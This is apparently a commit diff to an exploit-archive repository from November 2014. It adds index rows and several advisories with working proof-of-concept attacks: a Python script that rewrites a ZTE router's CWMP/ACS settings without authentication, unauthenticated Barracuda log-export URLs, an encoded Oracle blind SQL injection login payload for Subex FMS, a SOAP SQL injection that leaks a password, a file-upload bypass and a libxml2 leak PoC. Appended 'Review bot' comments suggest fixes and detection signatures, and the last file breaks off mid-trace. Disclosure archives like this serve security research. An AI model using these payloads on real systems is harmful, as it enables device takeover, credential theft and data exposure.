Updated 11_18_2014

This commit is contained in:
Offensive Security 2014-11-18 04:48:27 +00:00
parent 8484833cfa
commit 892f0c3055
28 changed files with 1373 additions and 209 deletions


@ -9035,7 +9035,7 @@ id,file,description,date,author,platform,type,port
9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability",2009-09-01,Kurd-Team,php,webapps,0 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability",2009-09-01,Kurd-Team,php,webapps,0
9573,platforms/windows/dos/9573.pl,"dTunes 2.72 (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0 9573,platforms/windows/dos/9573.pl,"dTunes 2.72 (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0
9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)",2009-09-02,spender,linux,local,0 9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)",2009-09-02,spender,linux,local,0
9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit",2009-09-02,Andi,linux,local,0 9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit",2009-09-02,Andi,linux,local,0
9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability",2009-09-02,ZhaoHuAn,php,webapps,0 9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability",2009-09-02,ZhaoHuAn,php,webapps,0
9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion Vulnerability",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion Vulnerability",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0
9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability",2009-09-02,v3n0m,php,webapps,0 9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability",2009-09-02,v3n0m,php,webapps,0
@ -31663,6 +31663,7 @@ id,file,description,date,author,platform,type,port
35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
35146,platforms/php/webapps/35146.txt,"PHP 5.x - Bypass Disable Functions (via Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@ -31673,6 +31674,7 @@ id,file,description,date,author,platform,type,port
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass, Reflected XSS, Stored XSS Vulnerability",2014-11-05,"Narendra Bhati",php,webapps,0
35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 0 - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0 35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 0 - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0
35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0 35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0
35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
@ -31702,19 +31704,25 @@ id,file,description,date,author,platform,type,port
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0 35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0
35193,platforms/php/webapps/35193.txt,"vldPersonals 2.7 Multiple Vulnerabilities",2014-11-10,"Mr T",php,webapps,0
35197,platforms/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 35197,platforms/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0
35198,platforms/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple XSS Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 35198,platforms/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple XSS Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0
35202,platforms/windows/dos/35202.py,"Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0
35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0
35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0
35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0"",NULL,NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0 35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0"",NULL,NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0
35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0 35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0
35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0
35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0 35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0
35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001
35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80
35214,platforms/multiple/webapps/35214.txt,"Subex FMS 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0
35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0
35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80
35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0
35220,platforms/multiple/webapps/35220.txt,"Joomla HD FLV Player < 2.1.0.1 - SQL Injection Vulnerability",2014-11-13,"Claudio Viviani",multiple,webapps,0
35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 (picture.php, rate param) - SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 (picture.php, rate param) - SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80
35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0
35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80
@ -31740,4 +31748,22 @@ id,file,description,date,author,platform,type,port
35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0
35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0
35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0 35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0
35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure Vulnerability",2011-01-24,"Kees Cook",multiple,remote,0
35253,platforms/php/webapps/35253.txt,"web@all 1.1 'url' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 'module_image.php' Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 'num' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 Arbitrary File Upload Vulnerability",2011-01-25,StenoPlasma,cfm,webapps,0
35257,platforms/php/webapps/35257.txt,"WordPress Videox7 UGC Plugin 2.5.3.2 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35258,platforms/php/webapps/35258.txt,"WordPress Audio Plugin 0.5.1 'showfile' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
35259,platforms/php/webapps/35259.txt,"PivotX 2.2 pivotx/includes/blogroll.php color Parameter XSS",2011-01-25,"High-Tech Bridge SA",php,webapps,0
35260,platforms/php/webapps/35260.txt,"PivotX 2.2 pivotx/includes/timwrapper.php src Parameter XSS",2011-01-25,"High-Tech Bridge SA",php,webapps,0
35261,platforms/php/webapps/35261.txt,"RSS Feed Reader WordPress Plugin 0.1 'rss_url' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
35262,platforms/php/webapps/35262.txt,"WordPress WP Featured Post with Thumbnail Plugin 3.0 'src' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
35263,platforms/php/webapps/35263.txt,"WordPress WP Publication Archive Plugin 2.0.1 'file' Parameter Information Disclosure Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0


11
platforms/cfm/webapps/35256.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/45985/info
ActiveWeb Professional is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; successful exploits will allow attackers to completely compromise the affected computer.
Lomtec ActiveWeb Professional 3.0 is vulnerable; other versions may also be affected.
1. Go to the page http://www.example.com/activeweb/EasyEdit.cfm?module=EasyEdit&page=getimagefile&Filter=
2. Change the 'UploadDirectory' and 'Accepted Extensions' hidden form fields to upload the malicious file to the directory of interest.
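Review bot: The advisory stops at the two reproduction steps and never states a fix or workaround, although step 2 already names the root cause: the upload handler trusts the client-supplied hidden form fields `UploadDirectory` and `Accepted Extensions`. A closing line such as `Fix/workaround: <vendor patch status — confirm>; the upload handler must enforce the target directory and the extension whitelist server-side instead of reading them from the submitted form` would give defenders the remediation the write-up implies. The "other versions may also be affected" caveat is also the only version information, so an "Affected:" line listing what was actually tested would help.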


@ -0,0 +1,47 @@
# Exploit Title: multiple Barracuda products logfile disclosure
# Date: 03/26/2014
# Exploit Author: Juergen Grieshofer / 4CKnowLedge
# Author Homepage: https://4ck.eu/
# Vendor Homepage: https://barracudalabs.com
# Software Link: https://firewall.ptest.cudasvc.com/
# Firmware v6.1.4.008 (2014-02-18 08:06:34)
# Modell: X300Vx
# BNSEC Nr: BNSEC-4189
-- Download logs without authentication --
$Logfiles
https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi?password=&et=&primary_tab=LOGS&log_type=fw&auth_type=Local&user=admin&locale=de_DE&secondary_tab=bfw_fwlog&export_name=export.csv?&auth_type=Local&et=&locale=de_DE&password=&realm=&role=&user=admin&primary_tab=LOGS&filter_query_netstring={%22data%22%3A[{%22field%22%3A%22%22%2C%22operator%22%3A%22%3D%22%2C%22values%22%3A[%22%22]}]%2C%22conjunction%22%3A[%22AND%22]}
For further logfiles replace the values of [fw, access, http, network, vpn, svc]
Timeline:
Vendor contacted: 03/26/2014
Vendor generic ticket response: 03/28/2014
Vendor response: 05/16/2014
Vendor approved fix: 08/02/2014
Advice: Update firmware to latest release
# Software Link: https://webfilter.ptest.cudasvc.com/
# Firmware v7.0.1.006 (2013-12-12 14:51:33)
# Modell: 610VX
# BNSEC Nr: BNSEC-4230, BNSEC-2528, BNSEC-4232
-- Download logs without authentication --
$Weblog
https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=spyware_log&message_total=
$Auditlog
https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&user=admin&primary_tab=BASIC&secondary_tab=audit_log&message_total=
$Infectionlog
https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=infection_activity&message_total=
Timeline:
Vendor contacted: 04/01/2014
Vendor response: 05/16/2014
Vendor approved fix: 08/02/2014
Advice: Update firmware to latest release
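Review bot: Both `Advice: Update firmware to latest release` lines leave the fixed firmware unnamed, so a reader holding v6.1.4.008 or v7.0.1.006 cannot tell whether those builds are the last vulnerable or the first fixed ones; add `Fixed in: <firmware version covering BNSEC-4189 / BNSEC-4230 — confirm with vendor>` under each timeline. The request URLs appear to be served despite an empty `password=` parameter with `user=admin`, which is the detail defenders need: requests to `/cgi-mod/logexport.cgi` and the `*_log_data.cgi` endpoints that arrive without an established session are the indicator to alert on in the appliance's web access logs, and the advisory could say so. `Modell` is the German spelling; `Model` is intended in both product blocks.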


@ -0,0 +1,62 @@
# Exploit Title: ZTE ZXHN H108L Authentication Bypass
# Date: 14/11/2014
# Exploit Author: Project Zero Labs (https://projectzero.gr |
labs@projectzero.gr)
# Vendor Homepage: www.zte.com.cn
# Version: ZXHN H108LV4.0.0d_ZRQ_GR4
# Tested on: ZTE ZXHN H108L
# CVE : CVE-2014-8493
#Original post at
https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/
Description
===========
CWMP configuration is accessible only through the Administrator account.
CWMP is a protocol widely used by ISPs worldwide for remote provisioning
and troubleshooting subscribers' equipment. However editing the CWMP
parameters (more specifically sending the POST request) does not require
any user authentication.
Proof of Concept
================
#!/usr/bin/python
import requests
acs_server = "http://<server>:<port>"
acs_user = "user"
acs_pass = "pass"
# Connection request parameters. When a request is made to the following
URL, using the specified user/pass combination,
# router will connect back to the ACS server.
conn_url = "/tr069"
conn_port = "7564"
conn_user = "user"
conn_pass = "pass"
#Periodic inform parameters
active = 1
interval = 2000
payload = {'CWMP_active': '1', 'CWMP_ACSURL':
acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass,
'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort':
conn_port, 'CWMP_ConnectionRequestUserName': conn_user,
'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive':
active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }
r = requests.post("http://192.168.1.254/Forms/access_cwmp_1",
data=payload)
Disclosure Timeline
===================
27/10/2014 - First communication attempt to both vendor and ISP
04/11/2014 - ZTE response stating that ISP should be contacted
03/11/2014 - Second attempt to contact the ISP.
14/11/2014 - No response from ISP. Public Disclosure
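Review bot: The disclosure timeline is out of order: `04/11/2014 - ZTE response stating that ISP should be contacted` is listed before `03/11/2014 - Second attempt to contact the ISP.`, so either the two dates are swapped or one is a typo; list the entries chronologically or correct the date. The advisory gives no fixed firmware or workaround beyond the tested version string `ZXHN H108LV4.0.0d_ZRQ_GR4`, so a line `Fix: <fixed firmware version or vendor status — confirm>` belongs after the CVE line. Since the PoC shows the CWMP configuration being rewritten with a caller-chosen `CWMP_ACSURL` and credentials, an unexpected change of those values on a deployed device is the indicator owners and ISPs should check for, and that is worth stating in the Description section.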


@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/45973/info
The 'libxml2' library is prone to a local information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
# Copyright 2010, Canonical, Ltd.
# Author: Kees Cook <kees@ubuntu.com>
# License: GPLv3
#
# Proof-of-concept memory content leak
$xw = new XMLWriter();
$xw->openURI('php://output');
$xw->startElement('input');
$xw->writeAttribute('value', "\xe0\x81");
$xw->endElement();
?>
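Review bot: The sentence `The 'libxml2' library is prone to a local information-disclosure vulnerability.` contradicts the index entry in files.csv, which files this PoC under `platforms/multiple/remote/35252.php`; one of the two should be corrected so the exposure is not misread. The PoC has no comment on the trigger: the attribute value `"\xe0\x81"` looks like a truncated multi-byte UTF-8 sequence (a lead byte followed by a single continuation byte), and a comment such as `# truncated UTF-8 sequence: the escaping code appears to read past the end of the short input — confirm against the upstream fix` would make the mechanism clear to a reader. Affected and fixed libxml2 versions are not given anywhere beyond the `2.6.x` in the index.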


@ -0,0 +1,38 @@
=======================================================================================
Subex ROC Fraud Management System v7.4 - Unauthenticated Blind-Time Based SQL Injection
=======================================================================================
Affected Software: Subex ROC FMS v7.4 (and probably earlier versions)
Vendor Homepage : http://www.subex.com/
Version : 7.4
Remote : Remote
Severity : Very High
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
CVE : CVE-2014-8728
[Summary]
A parameter at the login page of Subex ROC Fraud Management platform is vulnerable to blind-time based SQL injection.
[Vulnerability Details]
Authentication : The exploitation can be performed by any unauthenticated user.
Page : http://ip:port/login/login
Backend DB : Oracle
POST Parameter : ranger_user[name]
Sample HTTP POST Request - Data only:
-------------------------------------
ranger_user%5Bname%5D=admin%27%20AND%203402%3D%28CASE%20WHEN%20%28ASCII%28SUBSTRC%28%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20GRANTED_ROLE%20FROM%20DBA_ROLE_PRIVS%20WHERE%20GRANTEE%3DUSER%20AND%20GRANTED_ROLE%3DCHR%2868%29%7C%7CCHR%2866%29%7C%7CCHR%2865%29%29%3DCHR%2868%29%7C%7CCHR%2866%29%7C%7CCHR%2865%29%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%2C1%2C1%29%29%20%3E%2047%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28102%29%7C%7CCHR%28100%29%7C%7CCHR%28114%29%2C5%29%20ELSE%203402%20END%29%20AND%20%27a%27%3D%27a&ranger_user%5Bpassword%5D=secuid0&commit=Login&ranger_user_i2%5Bfeatures%5D=0
Effect, the page will load with a delay of 5 seconds if the current database user is a member of the database administrators.
Using similar SQL statements an unauthenticated malicious visitor is able to enumerate various information from the backend database including those of usernames and password hashes (select ranger_user_name,hashed_password from ROCDB.PASSWORDS where rownum<2). The hashes can further be cracked and be used to access the application. Obviously if the DB user for the application has enough privileges you may be able to own the whole Oracle server.
[Timeline]
09/05/2012 - Advisory created, contacted Subex
15/05/2012 - Subex responded
15/05/2012 - Advisory details shared
17/05/2012 - Subex covered the issue in the latest patch cycle
30/08/2014 - Advisory published
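Review bot: The timeline states `17/05/2012 - Subex covered the issue in the latest patch cycle`, but the header still reads `Affected Software: Subex ROC FMS v7.4 (and probably earlier versions)` with no fixed version, so a reader cannot tell which build closes CVE-2014-8728; add `Fixed in: <patched version — confirm with vendor>` to the header block. For detection, the sample request already gives the useful signature: a POST to `/login/login` whose `ranger_user[name]` value contains SQL keywords or `DBMS_PIPE.RECEIVE_MESSAGE`, together with login responses delayed by the injected wait, is what to alert on in the application's web logs, and the advisory could say so. The `Remote : Remote` header field is redundant; `Exploitation : Remote, unauthenticated` conveys the same thing once.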


@ -0,0 +1,105 @@
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
Release Date:
===========
13 Nov 2014
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
June 26, 2014 : Patch Released
13 Nov 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Promist Bilgi ?leti?im Teknolojileri A.?
Product: Proticaret E-commerce Script v3.0 >=
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
Critical
Technical Details & Description:
========================
SQL Injection
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetProductCodes>
<!--Optional:-->
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
<!--Optional:-->
<tem:StartWith>?</tem:StartWith>
</tem:GetProductCodes>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
